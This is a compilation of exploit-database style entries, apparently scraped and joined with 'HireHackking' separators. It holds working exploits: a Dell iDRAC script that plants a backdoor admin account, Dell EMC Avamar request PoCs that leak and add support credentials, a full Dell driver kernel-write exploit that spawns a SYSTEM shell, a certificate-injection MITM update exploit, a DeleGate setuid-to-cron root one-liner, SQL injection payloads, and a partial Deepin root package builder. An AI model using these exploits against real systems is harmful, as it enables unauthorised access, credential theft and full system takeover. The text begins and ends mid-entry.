AAACAAAAmAcAAJgHAACvAAAAAAAAAAAAAAAEAAAAAAAAAJIAAAABAAAAAgAAAEgIAABICAAABAAAAAAAAAAAAAAABAAAAAAAAACcAAAADgAAAAMAAAAUDwEAFA8AAAQAAAAAAAAAAAAAAAQAAAAEAAAAqAAAAAEAAAADAAAAGA8BABgPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAK8AAAABAAAAAwAAACAPAQAgDwAACAAAAAAAAAAAAAAABAAAAAAAAAC2AAAABgAAAAMAAAAoDwEAKA8AANgAAAAFAAAAAAAAAAQAAAAIAAAAvwAAAAEAAAADAAAAABABAAAQAAAEAAAAAAAAAAAAAAAEAAAAAAAAAMUAAAABAAAAAwAAAAQQAQAEEAAALAAAAAAAAAAAAAAABAAAAAQAAADKAAAACAAAAAMAAAAwEAEAMBAAAAgAAAAAAAAAAAAAAAQAAAAAAAAAzwAAAAEAAAAwAAAAAAAAADAQAAArAAAAAAAAAAAAAAABAAAAAQAAAAEAAAACAAAAAAAAAAAAAABcEAAAUAMAABkAAAAvAAAABAAAABAAAAAJAAAAAwAAAAAAAAAAAAAArBMAAIUBAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAADEVAADYAAAAAAAAAAAAAAABAAAAAAAAAA=='
#> For the source code of this pre-compiled C code, see below

## Main program
class CustomHTTPAdapter(requests.adapters.HTTPAdapter):
    def init_poolmanager(self, *args, **kwargs):
        context = requests.ssl.create_default_context()
        context.set_ciphers('ALL:@SECLEVEL=0')
        context.check_hostname = False
        context.minimum_version = requests.ssl.TLSVersion.SSLv3
        super().init_poolmanager(*args, **kwargs, ssl_context=context)

def callURL(sURL, oSession, bData=None, lstProxies={}, boolVerbose=False):
    try:
        if bData: oResponse = oSession.post(sURL, data=bData, proxies=lstProxies, verify=False) ## Removed timeout here, as it may take a long time to upload files
        else: oResponse = oSession.get(sURL, proxies=lstProxies, verify=False, timeout = iTimeout)
    except: oResponse = None
    return oResponse

def checkVuln(sIP, oSession, lstProxies={}, boolVerbose=False):
    oResponse = callURL(f'https://{sIP}/cgi-bin/login?LD_DEBUG=files', oSession, lstProxies = lstProxies)
    if not oResponse is None and 'calling init: /lib/' in oResponse.text: 
        if boolVerbose:
            print('[*] Data returned: ')
            print(oResponse.text)
        return True
    return False

def uploadAndRunLibrary(bData, oSession, sIP, lstProxies, boolVerbose=False):
    iFFLAGS = 1
    bFAlias = b'RACPKSSHAUTHKEY1'
    bLib = bFAlias + (32 - len(bFAlias))*b'\0'
    bLib += struct.pack('<L', len(bData))
    bLib += struct.pack('<L', iFFLAGS)
    bLib += bData

    oResp = callURL(f'https://{sIP}/cgi-bin/putfile', oSession, bLib, lstProxies, boolVerbose)
    if not oResp is None and oResp.status_code == 200: 
        print('[+] File upload successful, giving the system 5 seconds before execution')
        for i in range(5,0,-1): 
            print(i, end='\r')
            time.sleep(1)
    else: 
        print('[-] Error uploading a file, maybe timeout issue, exiting now')
        exit()
    
    oResp = callURL(f'https://{sIP}/cgi-bin/discover?LD_PRELOAD=/tmp/sshpkauthupload.tmp', oSession, None, lstProxies, boolVerbose)
    if not oResp is None and oResp.status_code == 200: 
        if boolVerbose: print('[+] Response on executing the library: \n{}'.format(oResp.text))
    else: 
        print('[-] Error executing the library, maybe timeout issue, exiting now')
        exit()
    return True

def main():
    sUsage = (
    'usage: %prog [options] IP/FQDN \n'
    'Example: CVE-2018-1207.py 192.168.0.100\n\n'
    'This script verifies CVE-2018-1207 and then configures/overwrites an admin user with ID 13\n'
    'Built-in creds: username \'user\' and password \'Passw0rd\''
    )

    parser = optparse.OptionParser(usage=sUsage)
    parser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080')
    parser.add_option('--verbose', '-v', dest='verbose', help='Optional: be verbose, default False', action='store_true', default = False)

    (options, args) = parser.parse_args()
    if len(args) == 0: exit(sUsage)
    sIP = args[0]
    oSession  = requests.Session()
    oSession.mount('https://', CustomHTTPAdapter())
    if options.proxy: lstProxies = {'https':options.proxy}
    else: lstProxies={}
    
    print('[+] Checking if https://{} is vulnerable'.format(sIP))
    if checkVuln(sIP, oSession, lstProxies, options.verbose):
        print('[+] Success, target seems vulnerable')
        input('[?] Proceed to exploit and overwrite user ID 13? Press enter to continue or Ctrl+C to cancel now')

    print('[+] Okay, uploading the pre-compiled file now, this might take a while: ')
    if uploadAndRunLibrary(base64.b64decode(sPayloadCode), oSession, sIP, lstProxies, options.verbose): print('[+] Succesfully started the reconfiguration of user ID 13')
    print('\n[+] All done, please allow 5 to 10 minutes for file execution and then\n     open a browser to https://{} and log in (user / Passw0rd)\n     or retrieve some hashes via the CLI tool racadm'.format(sIP))

if __name__ == '__main__':
    main()

'''
[adduser.c]
#include <unistd.h>
#include <stdio.h>

static void main(void) __attribute__((constructor));
static void main(void) 
{
	int pid1 = fork();
    if(!pid1) {
		execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminUserName", "user", (char*) NULL);
	}
	int pid2 = fork();
    if(!pid2) {
		execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminPassword", "Passw0rd", (char*) NULL);
	}
	int pid3 = fork();
    if(!pid3) {
		execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminPrivilege", "0x000001ff", (char*) NULL);
	}
	int pid4 = fork();
    if(!pid4) {
		execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminEnable", "1", (char*) NULL);
	}
	// Note: it takes 5 to 10 minutes before these 4 commands are executed
}
// Install "gcc-10-sh4-linux-gnu" (or replace gcc-10 with gcc-11 or newer) and compile the code like this:
//  sh4-linux-gnu-gcc-10 -shared -fPIC adduser.c -o adduser.so
'''
HireHackking 
# Exploit Title: [Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)]
# Date: [24/11/2017]
# Exploit Author: [SlidingWindow]
# Vendor Homepage: [https://store.Dell EMC.com/en-us/AVAMAR-PRODUCTS/Dell-DELL EMC-Avamar-Virtual-Edition-Data-Protection-Software/p/DELL EMC-Avamar-Virtual-Edition]
# Version: [Dell EMC Avamar Server 7.3.1 , Dell EMC Avamar Server 7.4.1, Dell EMC Avamar Server 7.5.0, Dell EMC Integrated Data Protection Appliance 2.0, Dell EMC Integrated Data Protection Appliance 2.1]
# Tested on: [Dell EMC Avamar Virtual Edition version 7.5.0.183]
# CVE : [CVE-2018-1217]

==================
#Product:-
==================
EMC Avamar Virtual Edition is great for enterprise backup data protection for small and medium sized offices. EMC Avamar Virtual Edition is optimized for backup and recovery of virtual and physical servers,enterprise applications,remote offices,and desktops or laptops.

==================
#Vulnerability:-
==================
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)

========================
#Vulnerability Details:-
========================

=====================================================================================================================================================
1. Missing functional level access control allows an unauthenticated user to add DELL EMC Support Account to the Installation Manager (CVE-2018-1217)
=====================================================================================================================================================

DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could add an Online Support Account for DELL EMC without any user interaction.

#Proof-Of-Concept:
------------------
1. Send following request to the target:

POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 8EGHBE4312AFBC12325324123DF4545A
X-GWT-Module-Base: https://<target_ip>/avi/avigui/
Referer: https://<target_ip>/avi/avigui.html
Content-Length: 452
Connection: close

7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611|<target_ip>|{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7|

2. Log into Avamar Installation Manager and navigate to Configuration tab to make sure that the user 'hacker' was added successfully.


=========================================================================================================================================================
2. Missing functional level access control allows an unauthenticated user to retrieve DELL EMC Support Account Credentials in Plain Text (CVE-2018-1217)
=========================================================================================================================================================

DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could retrieve Online Support Account password in plain text.

#Proof-Of-Concept:
------------------
1. Send following request to the target:

POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
DNT: 1
Content-Length: 192


7|0|6|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|<target_ip>|1|2|3|4|2|5|5|6|0|

2. Server returns credentials in plain text:

HTTP/1.1 200 OK
Date: Fri, 17 Nov 2017 10:46:31 GMT
Server: Jetty(9.0.6.v20130930)
Content-Type: application/json; charset=utf-8
Content-Disposition: attachment
Content-Length: 275
Connection: close

//OK[1,["{\"proxyHost\":null,\"proxyPort\":0,\"useProxyAuthentication\":false,\"proxyUsername\":\"\",\"proxyPassword\":\"\",\"disableInternetAccess\":false,\"proxyEnable\":false,\"emcsupportUsername\":\"hacker\",\"emcsupportPassword\":\"hacked3\",\"disableLDLS\":false}"],0,7]


=========================================================================================================================================================
3. Improper validation of ëDELL EMC Customer Support passcodeí allows an authenticated user to unlock DELL EMC Support Account and download verbose logs
=========================================================================================================================================================

DELL EMC Avamar fails to validate ëDELL EMC Customer Support passcodeí properly allowing an authenticated user to unlock the support account and view/download verbose logs. However, according to vendor, this one seems to be a vulnerability but it's an ambuious functionality instead.

#Proof-Of-Concept:
------------------
1. Try to unlock the support account with an invalid password and you get error 'Customer Support Access Denied':
2. Now send the same request again (with invalid password) and tamper the server response:

Request:
---------
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
X-GWT-Module-Base: https://<target_ip>/avi/avigui/
Referer: https://<target_ip>/avi/avigui.html
Content-Length: 202
Cookie: supo=x; JSESSIONID=9tt4unkdjjilbo072x4nji2y
Connection: close

7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611|<target_ip>|1|2|3|4|3|5|5|5|6|0|7|


Tampered response:
--------------------
HTTP/1.1 200 OK
Date: Fri, 24Nov 2017 07:57:25 GMT
Server: Jetty(9.0.6.v20130930)
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Disposition: attachment
Content-Length: 21
Connection: close

//OK[1,["true"],0,7]

3. This unlocks the support account and enabled the 'Log' download button.


===================================
#Vulnerability Disclosure Timeline:
===================================

11/2017: First email to disclose the vulnerability to EMC Security Response Team.
12/2017: Vendor confirmed vulnerability#1 and vulnerability#3, and discarded vulnerability#3 stating that this is an ambigious functionaliy and not a vulnerability.
12/2017: Vendor confirmed that the fix will be released in January 2018.
01/2018: Vendor delayed the fix release stating that the Dell EMC IDPA is also vulnerable.0
04/2018: Vendor assigned CVE-2018-1217 and pubished the advisory 'DSA-2018-025: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability': http://seclists.org/fulldisclosure/2018/Apr/14
HireHackking 
# Exploit Title: DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)
# Date: 10/05/2021
# Exploit Author: Paolo Stagno aka VoidSec
# Version: <= 2.3
# CVE: CVE-2021-21551
# Tested on: Windows 10 Pro x64 v.1903 Build 18362.30
# Blog: https://voidsec.com/reverse-engineering-and-exploiting-dell-cve-2021-21551/

#include <iostream>
#include <windows.h>
#include <winternl.h>
#include <tlhelp32.h>
#include <algorithm>

#define IOCTL_CODE 0x9B0C1EC8 // IOCTL_CODE value, used to reach the vulnerable function (taken from IDA)
#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2

// define the buffer structure which will be sent to the vulnerable driver
typedef struct Exploit
{
	uint64_t    Field1;     // "padding" can be anything
	void*		Field2;		// where to write
	uint64_t    Field3;     // must be 0
	uint64_t    Field4;     // value to write
};

typedef struct outBuffer
{
	uint64_t    Field1;
	uint64_t	Field2;
	uint64_t    Field3;
	uint64_t    Field4;
};

// define a pointer to the native function 'NtQuerySystemInformation'
using pNtQuerySystemInformation = NTSTATUS(WINAPI*)(
	ULONG SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength);

// define the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
	USHORT UniqueProcessId;
	USHORT CreatorBackTraceIndex;
	UCHAR ObjectTypeIndex;
	UCHAR HandleAttributes;
	USHORT HandleValue;
	PVOID Object;
	ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

// define the SYSTEM_HANDLE_INFORMATION structure
typedef struct _SYSTEM_HANDLE_INFORMATION
{
	ULONG NumberOfHandles;
	SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

int main(int argc, char** argv)
{

	// open a handle to the device exposed by the driver - symlink is \\.\\DBUtil_2_3
	HANDLE device = ::CreateFileW(
		L"\\\\.\\DBUtil_2_3",
		GENERIC_WRITE | GENERIC_READ,
		NULL,
		nullptr,
		OPEN_EXISTING,
		NULL,
		NULL);
	if (device == INVALID_HANDLE_VALUE)
	{
		std::cout << "[!] Couldn't open handle to DBUtil_2_3 driver. Error code: " << ::GetLastError() << std::endl;
		return -1;
	}
	std::cout << "[+] Opened a handle to DBUtil_2_3 driver!\n";

	// resolve the address of NtQuerySystemInformation and assign it to a function pointer
	pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)::GetProcAddress(::LoadLibraryW(L"ntdll"), "NtQuerySystemInformation");
	if (!NtQuerySystemInformation)
	{
		std::cout << "[!] Couldn't resolve NtQuerySystemInformation API. Error code: " << ::GetLastError() << std::endl;
		return -1;
	}
	std::cout << "[+] Resolved NtQuerySystemInformation!\n";

	// open the current process token - it will be used to retrieve its kernelspace address later
	HANDLE currentProcess = ::GetCurrentProcess();
	HANDLE currentToken = NULL;
	bool success = ::OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, &currentToken);
	if (!success)
	{
		std::cout << "[!] Couldn't open handle to the current process token. Error code: " << ::GetLastError() << std::endl;
		return -1;
	}
	std::cout << "[+] Opened a handle to the current process token!\n";

	// allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API
	PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(::GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);

	// call NtQuerySystemInformation and fill the handleTableInformation structure
	ULONG returnLength = 0;
	NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);

	uint64_t tokenAddress = 0;
	// iterate over the system's handle table and look for the handles beloging to our process
	for (int i = 0; i < handleTableInformation->NumberOfHandles; i++)
	{
		SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];
		// if it finds our process and the handle matches the current token handle we already opened, print it
		if (handleInfo.UniqueProcessId == ::GetCurrentProcessId() && handleInfo.HandleValue == (USHORT)currentToken)
		{
			tokenAddress = (uint64_t)handleInfo.Object;
			std::cout << "[+] Current token address in kernelspace is at: 0x" << std::hex << tokenAddress << std::endl;
		}
	}

	outBuffer buffer =
	{
		0,
		0,
		0,
		0
	};

	/*
	dt nt!_SEP_TOKEN_PRIVILEGES
	   +0x000 Present          : Uint8B
	   +0x008 Enabled          : Uint8B
	   +0x010 EnabledByDefault : Uint8B

	We've added +1 to the offsets to ensure that the low bytes part are 0xff.
	*/

	// overwrite the _SEP_TOKEN_PRIVILEGES  "Present" field in the current process token
	Exploit exploit =
	{
		0x4141414142424242,
		(void*)(tokenAddress + 0x40),
		0x0000000000000000,
		0xffffffffffffffff
	};

	// overwrite the _SEP_TOKEN_PRIVILEGES  "Enabled" field in the current process token
	Exploit exploit2 =
	{
		0x4141414142424242,
		(void*)(tokenAddress + 0x48),
		0x0000000000000000,
		0xffffffffffffffff
	};

	// overwrite the _SEP_TOKEN_PRIVILEGES  "EnabledByDefault" field in the current process token
	Exploit exploit3 =
	{
		0x4141414142424242,
		(void*)(tokenAddress + 0x50),
		0x0000000000000000,
		0xffffffffffffffff
	};

	DWORD bytesReturned = 0;
	success = DeviceIoControl(
		device,
		IOCTL_CODE,
		&exploit,
		sizeof(exploit),
		&buffer,
		sizeof(buffer),
		&bytesReturned,
		nullptr);
	if (!success)
	{
		std::cout << "[!] Couldn't overwrite current token 'Present' field. Error code: " << ::GetLastError() << std::endl;
		return -1;
	}
	std::cout << "[+] Successfully overwritten current token 'Present' field!\n";

	success = DeviceIoControl(
		device,
		IOCTL_CODE,
		&exploit2,
		sizeof(exploit2),
		&buffer,
		sizeof(buffer),
		&bytesReturned,
		nullptr);
	if (!success)
	{
		std::cout << "[!] Couldn't overwrite current token 'Enabled' field. Error code: " << ::GetLastError() << std::endl;
		return -1;
	}
	std::cout << "[+] Successfully overwritten current token 'Enabled' field!\n";

	success = DeviceIoControl(
		device,
		IOCTL_CODE,
		&exploit3,
		sizeof(exploit3),
		&buffer,
		sizeof(buffer),
		&bytesReturned,
		nullptr);
	if (!success)
	{
		std::cout << "[!] Couldn't overwrite current token 'EnabledByDefault' field. Error code:" << ::GetLastError() << std::endl;
		return -1;
	}
	std::cout << "[+] Successfully overwritten current token 'EnabledByDefault' field!\n";
	std::cout << "[+] Token privileges successfully overwritten!\n";
	std::cout << "[+] Spawning a new shell with full privileges!\n";

	system("cmd.exe");

	return 0;
}
HireHackking 
# Exploit Dell Customer Connect 1.3.28.0 Privilege Escalation
# Date: 25.04.2017
# Software Link: http://www.dell.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local
  
1. Description
 
DCCService.exe is running on autostart as System.

This service has auto update functionality.

Basically it periodically checks https://otbs.azurewebsites.net looking for new config file.

Under normal conditions we cannot spoof this connection because it’s SSL.

But here WebUtils.sendWebRequest() is executed using Impersonator.RunImpersonated().

RunImpersonated() executes given function in the context of currently logged in user.

In Windows system we can add any certificate to Local user root store.

Then this certificate is considered as trusted so we can perform MITM attack.

It can be done using simple proxy server because by default .NET HttpWebRequest() uses IE proxy settings (which can by set by any user without administrator priveleges).

https://security.szurek.pl/dell-customer-connect-13280-privilege-escalation.html

2. Proof of Concept

from _winreg import *
from threading import Thread
import os
import subprocess
import hashlib
import SimpleHTTPServer
import SocketServer
import ssl
import httplib
import time

msi_file = "exploit.msi"
cert_file = "otbs.crt"
signing_file = "code.cer"
file_port = 5555
proxy_port = 7777

print "Dell Customer Connect 1.3.28.0 Privilege Escalation"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"

# Simpe SSL proxy based on https://code.google.com/archive/p/proxpy/
class ProxyHandler(SocketServer.StreamRequestHandler):
	def __init__(self, request, client_address, server):
		SocketServer.StreamRequestHandler.__init__(self, request, client_address, server)

	def handle(self):
		global xml
		line = self.rfile.readline()
		for l in self.rfile:
			if l == "\r\n":
				break
			
		if "GET /api/AppConfig" in line:
			conn = httplib.HTTPSConnection(self.host, self.port)
			print "\n[+] Send XML to service"
			self.wfile.write("HTTP/1.1 200 200\r\n\r\n"+xml)
		elif "CONNECT otbs.azurewebsites.net:443" in line:
			socket_ssl = ssl.wrap_socket(self.request, server_side = True, certfile = cert_file, ssl_version = ssl.PROTOCOL_SSLv23, do_handshake_on_connect = False)
			self.request.send("HTTP/1.1 200 Connection Established\r\n\r\n")
			host, port = self.request.getpeername()
			self.host = host
			self.port = port
			while True:
				try:
					socket_ssl.do_handshake()
					break
				except (ssl.SSLError, IOError):
					return
			print "\n[+] SSL Established with otbs.azurewebsites.net"
			self.request = socket_ssl
			self.setup()
			self.handle()

class ThreadedHTTPProxyServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
	pass

def add_to_store(name, file):
	output = subprocess.Popen('certutil -user -addstore "Root" "{}"'.format(file), stdout=subprocess.PIPE).communicate()[0]
	if "\"{}\" already in store".format(name) in output:
		print "[+] Certificate {} already in store".format(name)
	elif "\"{}\" added to store".format(name) in output:
		print "[+] Add certificate {} to user root store".format(name)
	else:
		print "[-] You need to click OK in order to add cert to user root store"
		os._exit(0)


if not os.path.isfile(cert_file):
	print "[-] Missing SSL file"
	os._exit(0)

if not os.path.isfile(signing_file):
	print "[-] Missing code signing file"
	os._exit(0)

add_to_store("otbs.azurewebsites.net", cert_file)
add_to_store("dell inc", signing_file)

def sha256_checksum(filename, block_size=65536):
    sha256 = hashlib.sha256()
    with open(filename, 'rb') as f:
        for block in iter(lambda: f.read(block_size), b''):
            sha256.update(block)
    return sha256.hexdigest()

def file_server():
	Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
	httpd = SocketServer.TCPServer(("", file_port), Handler)
	httpd.serve_forever()

if not os.path.isfile(msi_file):
	print "[-] Missing msi file"
	os._exit(0)

sha256 = sha256_checksum(msi_file)
print "[+] MSI hash: {}".format(sha256)

print "[+] Set Proxy Server in registry"
key = OpenKey(HKEY_CURRENT_USER, r'Software\Microsoft\Windows\CurrentVersion\Internet Settings', 0, KEY_ALL_ACCESS)
SetValueEx(key, "ProxyServer", 0, REG_SZ, "127.0.0.1:{}".format(proxy_port))
SetValueEx(key, "ProxyEnable", 0, REG_DWORD, 1)
CloseKey(key)

print "[+] Start file server on port {}".format(file_port)
t1 = Thread(target = file_server)
t1.daemon = True
t1.start()

xml = "<UpdateResponse xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><LatestVersion>9.0.0.6</LatestVersion><UpgradeUrl>http://localhost:{}/{}</UpgradeUrl><UpgradeHash>{}</UpgradeHash><SurveyCheckInterval>1</SurveyCheckInterval></UpdateResponse>".format(file_port, msi_file, sha256)

print "[+] Start proxy server on port {}".format(proxy_port)
proxy_server = ThreadedHTTPProxyServer(("127.0.0.1", proxy_port), ProxyHandler)
t2 = Thread(target = proxy_server.serve_forever)
t2.daemon = True
t2.start()

log_path = r"C:\Users\All Users\Dell\Dell Customer Connect\Logs\{}_install_log.txt".format(msi_file)

print "[+] Waiting for execution ",

while True:
	if os.path.isfile(log_path):
		print "\n[+] Looks like msi file was executed, exiting"
		os._exit(0)
	time.sleep(3)
	print ".",

3. Fix

http://www.dell.com/support/home/us/en/19/Drivers/DriversDetails?driverId=DR53F
HireHackking 
Title: Local root vulnerability in DeleGate v9.9.13
Author: Larry W. Cashdollar, @_larry0
Date: 2015-12-17
Advisory: http://www.vapidlabs.com/advisory.php?v=159
Download Sites: http://delegate.hpcc.jp/delegate/ 
                              http://delegate.org/delegate/
Vendor: National Institute of Advanced Industrial Science and Technology
Vendor Notified: 2015-12-17
Vendor Contact: y.sato@delegate.org ysato@etl.go.jp
Description: DeleGate is a multipurpose proxy server which relays various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and more. DeleGate mediates communication between servers and clients where direct communication is impossible, inefficient, or inconvenient.

Vulnerability:
Installation of delegate 9.9.13 sets some binaries setuid root, at least one of these binaries can be used to escalate the privileges of a local user.  The binary dgcpnod creates a node allowing a local unprivileged user to create files anywhere on disk.   By creating a file in /etc/cron.hourly a local user can execute commands as root.

Installation of software via source or binary distribution with option to not run as root results in a script set-subin.sh to run setting the setuid bit on four binaries.  In Linux distributions where this software is part of the package list these binaries are not setuid root. (archlinux)

From documentation http://www.delegate.org/delegate/newbies-ja.shtml (translated to english):
Go is included in the binary distribution, or DGROOT that you can build from the source to the location of preference, and then change the name if necessary. This is the DgRoot. In addition, if needed, you can rename the executable file of DeleGate to the name of the preference. This is the DgExe.
"In Unix version subin in if you want to use "(such as when using a privileged port), do the following.

  (3-2uk) $ cd DgRoot / subin
          $ Sh setup-subin.sh

larry@f4ult:~/dg9_9_13/DGROOT/subin$ ls -l
total 1916
-r-sr-s--- 1 root  larry 384114 Oct 31  2014 dgbind
-r-sr-s--- 1 root  larry 384598 Oct 31  2014 dgchroot
-r-sr-s--- 1 root  larry 384161 Oct 31  2014 dgcpnod
-rwxr-xr-x 1 larry larry 384114 Oct 31  2014 dgdate
-rwxr-xr-x 1 larry larry  29066 Oct 31  2014 dgforkpty
-r-sr-s--- 1 root  larry 384113 Oct 31  2014 dgpam
-rwxr-x--- 1 larry larry    272 Oct 27  2014 setup-subin.sh

This script sets the setuid bit on four binaries:

larry@f4ult:~/dg9_9_13/DGROOT/subin$ cat setup-subin.sh
#!/bin/sh

SUBINS="dgpam dgbind dgchroot dgcpnod"
sudo sh -c "chown root $SUBINS; chmod 6550 $SUBINS"
if [ $? != 0 ]; then
  su root -c "chown root $SUBINS; chmod 6550 $SUBINS"
fi

CVEID: 2015-7556


Exploit Code:
$ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme
HireHackking 
===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is
the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : search_keyword
# Attack Pattern : %27 aNd 9521793=9521793 aNd %276199%27=%276199
# POST Method :
http://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is
the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : description
# Attack Pattern : %27) aNd if(length(0x454d49524f474c55)>1,sleep(3),0)
--%20
# POST Method : http://localhost/Script/admin?id=&description=[TEXT
INPUT]2350265[SQL Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is
the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : password
# Attack Pattern : %22) aNd 7595147=7595147 aNd (%226199%22)=(%226199
# POST Method :
http://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL
Inject Here]
===========================================================================================
###########################################################################################
HireHackking 
#!/bin/bash
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user
# in the sudo group to install arbitrary packages without providing a password,
# resulting in code execution as root. By default, the first user created on
# the system is a member of the sudo group.
# ~ bcoles
#
# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/
#
echo Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
echo Building package...
BASE="/tmp/"
UUID=$(cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 32 | head -n 1)
mkdir "${BASE}${UUID}" && mkdir "${BASE}${UUID}/DEBIAN"
echo -e "Package: ${UUID}\nVersion: 0.1\nMaintainer: ${UUID}\nArchitecture: all\nDescription: ${UUID}" > ${BASE}${UUID}/DEBIAN/control
echo -e "#!/bin/sh\ncp /bin/sh ${BASE}/rootsh\nchmod 04755 ${BASE}/rootsh\n" > ${BASE}${UUID}/DEBIAN/postinst
chmod +x ${BASE}${UUID}/DEBIAN/postinst
